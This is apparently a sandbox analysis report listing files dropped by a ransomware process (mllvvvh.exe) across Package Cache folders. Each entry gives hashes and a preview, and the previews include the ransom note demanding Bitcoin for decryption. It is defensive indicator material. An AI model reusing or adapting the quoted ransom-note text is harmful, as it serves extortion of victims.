                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
